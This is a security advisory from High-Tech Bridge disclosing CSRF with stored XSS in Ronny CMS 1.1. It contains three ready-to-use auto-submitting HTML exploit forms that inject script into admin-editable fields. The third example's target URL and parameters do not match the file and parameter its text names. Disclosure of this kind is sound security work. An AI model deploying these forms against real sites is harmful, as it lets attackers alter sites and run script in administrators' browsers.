Total Tests:

Cross-site Request Forgery (CSRF) Vulnerabilities in Ronny CMS

Advisory ID:HTB22622
Product:Ronny CMS
Vendor:TO4KA Programming Team
Vulnerable Versions:1.1 r935 and probably prior
Tested Version:1.1 r935
Advisory Publication:September 29, 2010 [without technical details]
Vendor Notification:September 29, 2010
Public Disclosure:October 13, 2010
Vulnerability Type:Cross-Site Request Forgery [CWE-352]
Risk Level:Medium
CVSSv2 Base Score:4 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Ronny CMS which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) in Ronny CMS
1.1 The vulnerability exists due to insufficient validation of the request origin in modules/system/admin/blocksadmin/blocksadmin.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change website settings. Due to insufficient sanitation of input data in the “btitle” parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website. Successful exploitation requires that victim is logged-in as an administrator.
Exploitation example:
<form action="http://host/system/admin.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="bside" value="0" />
<input type="hidden" name="bshow_template" value="standard" />
<input type="hidden" name="bcmodule[]" value="-1" />
<input type="hidden" name="bcmodule[]" value="0" />
<input type="hidden" name="bcmodule[]" value="2" />
<input type="hidden" name="bcmodule[]" value="3" />
<input type="hidden" name="bvisible" value="0" />
<input type="hidden" name="bweight" value="" />
<input type="hidden" name="btitle" value='1"><script>alert(document.cookie)</script>' />
<input type="hidden" name="bcontent" value="" />
<input type="hidden" name="bctype" value="H" />
<input type="hidden" name="fct" value="blocksadmin" />
<input type="hidden" name="op" value="save" />
</form>
<script>
document.main.submit();
</script>

1.2 The vulnerability exists due to insufficient validation of the request origin in modules/menu/admin/include/menu.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and edit arbitrary menu items. Due to insufficient sanitation of input data in the “name” parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website. Successful exploitation requires that victim is logged-in as an administrator.
Exploitation example:
<form action="http://host/menu/admin/index.php?op=saveItem" method="post" name="main" >
<input type="hidden" name="menuid" value="1" />
<input type="hidden" name="id" value="2" />
<input type="hidden" name="pid" value="0" />
<input type="hidden" name="name" value='Pages<script>alert(document.cookie)</script>' />
<input type="hidden" name="url" value="/pages/" />
<input type="hidden" name="order" value="20" />
</form>
<script>
document.main.submit();
</script>

1.3 The vulnerability exists due to insufficient validation of the request origin in modules/pages/admin/include/pages.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and edit articles. Due to insufficient sanitation of input data in the “pdesc” parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website. Successful exploitation requires that victim is logged-in as an administrator.
Exploitation example:
<form action="http://host/admin/news.php?edit=NEWS_ID" method="post" name="main">
<input type="hidden" name="header" value='newsheader"><script>alert(document.cookie)</script>'>
<input type="hidden" name="message" value="message">
<input type="hidden" name="extramessage" value="extramessage">
<input type="hidden" name="newsdoing" value="Submit">
</form>
<script>
document.main.submit();
</script>

How to Detect Cross-Site Request Forgery Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.


References:
[1] High-Tech Bridge Advisory HTB22622 - https://www.immuniweb.com/advisory/HTB22622 - Cross-site Request Forgery (CSRF) Vulnerabilities in Ronny CMS
[2] Ronny CMS - ronny-cms.ru - Kandidat CMS is a content management system written in PHP.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential